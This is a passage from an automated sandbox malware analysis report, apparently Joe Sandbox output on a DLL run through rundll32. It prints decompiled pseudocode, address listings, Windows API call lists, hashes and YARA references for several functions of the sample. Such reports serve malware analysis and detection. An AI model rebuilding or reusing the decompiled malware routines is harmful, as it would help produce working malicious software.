								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                            0x049f70b5
                                            0x049f70bc
                                            0x049f70c1
                                            0x049f70c4
                                            0x049f70cb
                                            0x049f70ce
                                            0x049f70d1
                                            0x049f70d6
                                            0x049f70db
                                            0x049f722f
                                            0x049f7231
                                            0x049f7233
                                            0x049f7238
                                            0x049f7238
                                            0x049f70e1
                                            0x049f70e4
                                            0x049f70e7
                                            0x049f70e9
                                            0x049f70e9
                                            0x049f70ed
                                            0x00000000
                                            0x00000000
                                            0x049f70f1
                                            0x049f711d
                                            0x049f7122
                                            0x049f7124
                                            0x049f7124
                                            0x049f7127
                                            0x049f712a
                                            0x049f712a
                                            0x049f712c
                                            0x00000000
                                            0x049f70f7
                                            0x049f70f9
                                            0x049f7118
                                            0x049f7118
                                            0x049f712f
                                            0x049f712f
                                            0x049f7130
                                            0x049f7130
                                            0x049f7133
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f7133
                                            0x049f70fd
                                            0x049f7144
                                            0x049f7148
                                            0x049f7222
                                            0x049f7224
                                            0x049f7224
                                            0x049f7225
                                            0x049f7228
                                            0x00000000
                                            0x049f7228
                                            0x049f7151
                                            0x049f7162
                                            0x049f7166
                                            0x049f721e
                                            0x00000000
                                            0x049f721e
                                            0x049f716c
                                            0x049f716f
                                            0x049f7173
                                            0x049f7177
                                            0x049f717c
                                            0x049f7214
                                            0x049f7214
                                            0x00000000
                                            0x049f721a
                                            0x049f7187
                                            0x049f7190
                                            0x049f71a4
                                            0x049f71ab
                                            0x049f71c0
                                            0x049f71c6
                                            0x049f71ce
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f71d0
                                            0x049f71d0
                                            0x049f71d0
                                            0x049f71d7
                                            0x049f71df
                                            0x00000000
                                            0x00000000
                                            0x049f71e1
                                            0x049f71ea
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f71ec
                                            0x049f71ee
                                            0x049f71f1
                                            0x049f71f1
                                            0x049f71f4
                                            0x049f71f8
                                            0x049f71fb
                                            0x049f7201
                                            0x049f7204
                                            0x049f720b
                                            0x00000000
                                            0x049f7187
                                            0x049f7102
                                            0x049f710a
                                            0x049f7110
                                            0x049f7112
                                            0x049f7112
                                            0x049f7115
                                            0x049f7117
                                            0x00000000
                                            0x049f7117
                                            0x049f70f1
                                            0x049f7137
                                            0x049f713c
                                            0x049f713e
                                            0x049f713e
                                            0x049f7141
                                            0x049f7141
                                            0x00000000

                                            APIs
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • lstrcpy.KERNEL32(69B25F45,00000020), ref: 049F71AB
                                            • lstrcat.KERNEL32(69B25F45,00000020), ref: 049F71C0
                                            • lstrcmp.KERNEL32(00000000,69B25F45), ref: 049F71D7
                                            • lstrlen.KERNEL32(69B25F45), ref: 049F71FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                            • String ID:
                                            • API String ID: 3214092121-3916222277
                                            • Opcode ID: e34c1a72c8f0fbf1f972f8b43410307e1364641c664d3d89633ba565a3e08a21
                                            • Instruction ID: 0a1d6801092830d21aab2120ccdd30e162a202a00b621b68314e75b08284cf49
                                            • Opcode Fuzzy Hash: e34c1a72c8f0fbf1f972f8b43410307e1364641c664d3d89633ba565a3e08a21
                                            • Instruction Fuzzy Hash: 5F517071A00108EBDF21CFD9C884AEDBBBAFF55314F1584AAEE159B201C770BA55CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F1666 Relevance: 7.6, APIs: 5, Instructions: 96synchronizationCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F1666(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x49fa310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x49fa348; // 0x57d5a8
				_t3 = _t8 + 0x49fb87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E049F4B16(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x49fa34c, 1, 0, _t30);
					E049F4C73(_t30);
				}
				_t12 =  *0x49fa2fc; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t14 = E049F2384(_t32, 0); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E049F6DB6(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E049F3E6C(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

















                                            0x049f1667
                                            0x049f166e
                                            0x049f1678
                                            0x049f167c
                                            0x049f1682
                                            0x049f1691
                                            0x049f1698
                                            0x049f169c
                                            0x049f16ae
                                            0x049f16b0
                                            0x049f16b0
                                            0x049f16b5
                                            0x049f16bc
                                            0x049f1713
                                            0x049f1713
                                            0x049f1719
                                            0x049f171b
                                            0x049f171b
                                            0x049f1720
                                            0x049f1725
                                            0x049f1729
                                            0x049f173b
                                            0x049f173b
                                            0x049f173f
                                            0x049f1745
                                            0x049f1745
                                            0x00000000
                                            0x049f16cc
                                            0x049f16cc
                                            0x049f16d3
                                            0x00000000
                                            0x00000000
                                            0x049f16da
                                            0x049f16e2
                                            0x049f16e6
                                            0x049f16ea
                                            0x049f16ea
                                            0x049f16f2
                                            0x049f16f7
                                            0x049f16fb
                                            0x049f16ff
                                            0x049f1754
                                            0x049f175a
                                            0x049f175a
                                            0x049f170d
                                            0x049f1711
                                            0x049f1748
                                            0x049f174a
                                            0x049f174d
                                            0x049f174d
                                            0x00000000
                                            0x049f174a
                                            0x049f1711
                                            0x00000000
                                            0x049f16fb

                                            APIs
                                              • Part of subcall function 049F4B16: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04F79DA0,00000000,?,?,69B25F44,00000005,049FA00C,4D283A53,?,?), ref: 049F4B4C
                                              • Part of subcall function 049F4B16: lstrcpy.KERNEL32(00000000,00000000), ref: 049F4B70
                                              • Part of subcall function 049F4B16: lstrcat.KERNEL32(00000000,00000000), ref: 049F4B78
                                            • CreateEventA.KERNEL32(049FA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,049F2AA1,?,?,?), ref: 049F16A7
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            • StrChrW.SHLWAPI(049F2AA1,00000020,61636F4C,00000001,00000000,?,?,00000000,?,049F2AA1,?,?,?), ref: 049F16DA
                                            • WaitForSingleObject.KERNEL32(00000000,00004E20,049F2AA1,00000000,00000000,?,00000000,?,049F2AA1,?,?,?), ref: 049F1707
                                            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,049F2AA1,?,?,?), ref: 049F1735
                                            • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,049F2AA1,?,?,?), ref: 049F174D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                            • String ID:
                                            • API String ID: 73268831-0
                                            • Opcode ID: 2e286703897d6ca25bcbf75a2fda1f74d922b8192f3b92d5ae035b599087607d
                                            • Instruction ID: 22d02197c2e65db7fab65278e7133d255a82e3dc9fe7bc05742396922049e542
                                            • Opcode Fuzzy Hash: 2e286703897d6ca25bcbf75a2fda1f74d922b8192f3b92d5ae035b599087607d
                                            • Instruction Fuzzy Hash: 91210132600B11DBD7315EA89C86BAA76ACEBC8B25B190235FF19AB140DB64EC0187D4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580EEA4 Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0581BAC0: RegCreateKeyA.ADVAPI32(80000001,05D7B7F0,?), ref: 0581BAD5
                                              • Part of subcall function 0581BAC0: lstrlen.KERNEL32(05D7B7F0,00000000,00000000,0582806E,?,?,?,05806B9D,00000001,00000000,?), ref: 0581BAFE
                                            • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,765BD3B0,76C85520,?,?,?,058021C2,?), ref: 0580EEDC
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580EEF0
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,058021C2,?,?,?), ref: 0580EF0A
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,058021C2,?,?,?), ref: 0580EF26
                                            • RegCloseKey.KERNEL32(?,?,?,?,058021C2,?,?,?), ref: 0580EF34
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                                            • String ID:
                                            • API String ID: 1633053242-0
                                            • Opcode ID: dfdb898152c4c1a9c87488b507abaeb6a1a2b93a8913c9983114bae6b2e5e228
                                            • Instruction ID: 5c3c3ad6fe4fba9b1c77d7d0cabf047c813c95e5b084aedfa48f8fc3e28cf980
                                            • Opcode Fuzzy Hash: dfdb898152c4c1a9c87488b507abaeb6a1a2b93a8913c9983114bae6b2e5e228
                                            • Instruction Fuzzy Hash: 9E1137B651010DBFDF119FA4DC86CAF7F6EFB48254B14486AFD01D3110DA31AD919B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05804345 Relevance: 7.5, APIs: 5, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000,?), ref: 05804366
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0580437F
                                            • OpenProcess.KERNEL32(00000400,00000000,69B25F44,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?), ref: 0580439C
                                            • IsWow64Process.KERNEL32(?,00000000,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000), ref: 058043AD
                                            • FindCloseChangeNotification.KERNEL32(?,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000,?), ref: 058043C0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
                                            • String ID:
                                            • API String ID: 1712524627-0
                                            • Opcode ID: 9708ddb8a2f4c7a3e1bfb836cf5bdbe0e9746d23f93466fe35043f36e6fd8cde
                                            • Instruction ID: c99343957caa09f90ef7aa603a82b139d620a62f4ddb461a5d25f40b13c93af1
                                            • Opcode Fuzzy Hash: 9708ddb8a2f4c7a3e1bfb836cf5bdbe0e9746d23f93466fe35043f36e6fd8cde
                                            • Instruction Fuzzy Hash: 0301AD71950204EFDF60DF55DC0ACAA7FE8FB84351B119219FE05C3250EB316A81CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580A0F2 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNEL32(00000000,00000000,00000040,05801765,?,?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A117
                                            • GetLastError.KERNEL32(?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A11F
                                            • VirtualQuery.KERNEL32(00000000,?,0000001C,?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A136
                                            • VirtualProtect.KERNEL32(00000000,00000000,-2C9B417C,05801765,?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A15B
                                            • SetLastError.KERNEL32(?,?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A164
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtual$ErrorLastProtect$Query
                                            • String ID:
                                            • API String ID: 148356745-0
                                            • Opcode ID: 7bbdfa247dfbabd32a17452888523b67827584103c199dfc967a7f1f7d4e97a1
                                            • Instruction ID: 42ffeaacc48cf76ff7539c70627c1599303d1c3e515453d44289618e7a647d85
                                            • Opcode Fuzzy Hash: 7bbdfa247dfbabd32a17452888523b67827584103c199dfc967a7f1f7d4e97a1
                                            • Instruction Fuzzy Hash: D801E972500209BF9F12AF96DC4589ABFBDFF582547018026FD02E3160EB71E954DBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02CC236F Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 220memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.419649464.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_2cc0000_rundll32.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID: X
                                            • API String ID: 544645111-3081909835
                                            • Opcode ID: e4223aaaa941ca7609270bea9d228aba8bcdc66d6d3ef9be42c7e8713cb92b5a
                                            • Instruction ID: 755a9facb50c812c9ebc8878f6e9ac2a9da3fdd2525608524b731d9e188e0201
                                            • Opcode Fuzzy Hash: e4223aaaa941ca7609270bea9d228aba8bcdc66d6d3ef9be42c7e8713cb92b5a
                                            • Instruction Fuzzy Hash: 53B1BDB4E002288FDB54CF59C890B9DBBB1BF88304F2581AED908AB356D775A985CF41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F1000 Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SysAllocString.OLEAUT32(80000002), ref: 049F105D
                                            • SysAllocString.OLEAUT32(049F6ECE), ref: 049F10A1
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F10B5
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F10C3
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: String$AllocFree
                                            • String ID:
                                            • API String ID: 344208780-0
                                            • Opcode ID: 02bc8bfb2d3f21b11a2568fcd78e07c46bbde4a7514644f892e66008ddf1f321
                                            • Instruction ID: 5e54d33d4eb70de64bff9445517f3ee5a810df9b71feaa3edb12f26b8412469e
                                            • Opcode Fuzzy Hash: 02bc8bfb2d3f21b11a2568fcd78e07c46bbde4a7514644f892e66008ddf1f321
                                            • Instruction Fuzzy Hash: 9F312F72900259EFCB04DF98D8959AE7BB9FF48300B24843EFA05D7250D775A981CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F5803 Relevance: 6.1, APIs: 4, Instructions: 87memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 66%
                                            			E049F5803(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				void* _t26;
				intOrPtr _t30;
				intOrPtr _t37;
				intOrPtr* _t43;
				void* _t44;
				void* _t47;
				intOrPtr* _t49;
				void* _t50;
				intOrPtr _t51;

				_t47 = __edx;
				_t44 = __ecx;
				_t43 = _a16;
				_t49 = __eax;
				_t22 =  *0x49fa348; // 0x57d5a8
				_t2 = _t22 + 0x49fb682; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
				_t51 =  *0x49fa3e0; // 0x4f79ba8
				_push(0x800);
				_push(0);
				_push( *0x49fa2d8);
				if( *0x49fa2ec >= 5) {
					_t26 = RtlAllocateHeap(); // executed
					if(_t26 == 0) {
						L6:
						_a4 = 8;
						L7:
						if(_a4 != 0) {
							L10:
							 *0x49fa2ec =  *0x49fa2ec + 1;
							L11:
							return _a4;
						}
						_t52 = _a16;
						 *_t49 = _a16;
						_t50 = _v8;
						 *_t43 = E049F2087(_t52, _t50); // executed
						_t30 = E049F6D7F(_t50, _t52); // executed
						if(_t30 != 0) {
							 *_a8 = _t50;
							 *_a12 = _t30;
							if( *0x49fa2ec < 5) {
								 *0x49fa2ec =  *0x49fa2ec & 0x00000000;
							}
							goto L11;
						}
						_a4 = 0xbf;
						E049F3F62();
						HeapFree( *0x49fa2d8, 0, _t50);
						goto L10;
					}
					_t37 = E049F636D(_a4, _t47, _t51,  &_v48,  &_v8,  &_a16, _t26);
					L5:
					_a4 = _t37;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t37 = E049F59E2(_a4, _t44, _t47, _t51,  &_v48,  &_v8,  &_a16, _t38);
				goto L5;
			}
















                                            0x049f5803
                                            0x049f5803
                                            0x049f580a
                                            0x049f5811
                                            0x049f5815
                                            0x049f581a
                                            0x049f5825
                                            0x049f582b
                                            0x049f583b
                                            0x049f5840
                                            0x049f5842
                                            0x049f5848
                                            0x049f586c
                                            0x049f5874
                                            0x049f5891
                                            0x049f5891
                                            0x049f5898
                                            0x049f589c
                                            0x049f58d6
                                            0x049f58d6
                                            0x049f58dc
                                            0x049f58e3
                                            0x049f58e3
                                            0x049f589e
                                            0x049f58a1
                                            0x049f58a3
                                            0x049f58b0
                                            0x049f58b2
                                            0x049f58b9
                                            0x049f58f0
                                            0x049f58f5
                                            0x049f58f7
                                            0x049f58f9
                                            0x049f58f9
                                            0x00000000
                                            0x049f58f7
                                            0x049f58bb
                                            0x049f58c2
                                            0x049f58d0
                                            0x00000000
                                            0x049f58d0
                                            0x049f5887
                                            0x049f588c
                                            0x049f588c
                                            0x00000000
                                            0x049f588c
                                            0x049f5852
                                            0x00000000
                                            0x00000000
                                            0x049f5865
                                            0x00000000

                                            APIs
                                            • wsprintfA.USER32 ref: 049F5825
                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 049F584A
                                              • Part of subcall function 049F59E2: GetTickCount.KERNEL32 ref: 049F59F6
                                              • Part of subcall function 049F59E2: wsprintfA.USER32 ref: 049F5A46
                                              • Part of subcall function 049F59E2: wsprintfA.USER32 ref: 049F5A63
                                              • Part of subcall function 049F59E2: wsprintfA.USER32 ref: 049F5A83
                                              • Part of subcall function 049F59E2: wsprintfA.USER32 ref: 049F5AAF
                                              • Part of subcall function 049F59E2: HeapFree.KERNEL32(00000000,00000000), ref: 049F5AC1
                                              • Part of subcall function 049F59E2: wsprintfA.USER32 ref: 049F5AE2
                                              • Part of subcall function 049F59E2: HeapFree.KERNEL32(00000000,00000000), ref: 049F5AF2
                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 049F586C
                                            • HeapFree.KERNEL32(00000000,?,?), ref: 049F58D0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: wsprintf$Heap$Free$Allocate$CountTick
                                            • String ID:
                                            • API String ID: 1428766365-0
                                            • Opcode ID: 0ecf4fd80b73a91c342357dcc4bbc4a853eef7d69f2394d8b2a606df06765385
                                            • Instruction ID: 24400de47b95af223289deb4ee187c2af2c42dfea9cd1c2fa80684e0a06af8e1
                                            • Opcode Fuzzy Hash: 0ecf4fd80b73a91c342357dcc4bbc4a853eef7d69f2394d8b2a606df06765385
                                            • Instruction Fuzzy Hash: 96313A72604209BBDB01DF94DC84EDA3BBCFB48364F118432FA09E7211E775A955DBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F29F2 Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 41%
                                            			E049F29F2(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E049F6174(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E049F75C6(_t23);
						}
					}
					return _t38;
				}
				_t26 = E049F6955(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x49fa34c, 1, 0,  *0x49fa3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E049F737F(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E049F6E20(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E049F5147(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E049F1666( &_v32, _t39);
					goto L13;
				}
			}














                                            0x049f29f2
                                            0x049f29ff
                                            0x049f2a05
                                            0x049f2a06
                                            0x049f2a07
                                            0x049f2a08
                                            0x049f2a09
                                            0x049f2a0d
                                            0x049f2a14
                                            0x049f2a19
                                            0x049f2a1d
                                            0x049f2aa5
                                            0x049f2aa5
                                            0x049f2aa8
                                            0x049f2aaa
                                            0x049f2ab2
                                            0x049f2ab8
                                            0x049f2abb
                                            0x049f2abb
                                            0x049f2ab8
                                            0x049f2ac6
                                            0x049f2ac6
                                            0x049f2a29
                                            0x049f2a30
                                            0x049f2a32
                                            0x049f2a32
                                            0x049f2a49
                                            0x049f2a4d
                                            0x049f2a50
                                            0x049f2a5b
                                            0x049f2a62
                                            0x049f2a62
                                            0x049f2a6b
                                            0x049f2a6f
                                            0x049f2a7d
                                            0x049f2a71
                                            0x049f2a71
                                            0x049f2a72
                                            0x049f2a73
                                            0x049f2a74
                                            0x049f2a75
                                            0x049f2a76
                                            0x049f2a76
                                            0x049f2a82
                                            0x049f2a85
                                            0x049f2a89
                                            0x049f2a8b
                                            0x049f2a8b
                                            0x049f2a92
                                            0x00000000
                                            0x049f2a94
                                            0x049f2a94
                                            0x049f2aa1
                                            0x00000000
                                            0x049f2aa1

                                            APIs
                                            • CreateEventA.KERNEL32(049FA34C,00000001,00000000,00000040,?,?,76CDF710,00000000,76CDF730), ref: 049F2A43
                                            • SetEvent.KERNEL32(00000000), ref: 049F2A50
                                            • Sleep.KERNEL32(00000BB8), ref: 049F2A5B
                                            • CloseHandle.KERNEL32(00000000), ref: 049F2A62
                                              • Part of subcall function 049F737F: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,049F2A82,?), ref: 049F73A5
                                              • Part of subcall function 049F737F: RegEnumKeyExA.KERNEL32(?,?,?,049F2A82,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,049F2A82), ref: 049F73EC
                                              • Part of subcall function 049F737F: WaitForSingleObject.KERNEL32(00000000,?,?,?,049F2A82,?,049F2A82,?,?,?,?,?,049F2A82,?), ref: 049F7459
                                              • Part of subcall function 049F737F: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,049F2A82,?), ref: 049F7481
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                                            • String ID:
                                            • API String ID: 891522397-0
                                            • Opcode ID: 2d72d3d55e27035809f0da3805a262f5cddf02ad5f398c47c1cfa90540f60b7d
                                            • Instruction ID: df410b5d79d27c3aec793815561d6129eda9193e22440c93bd0d0fa5dc3de859
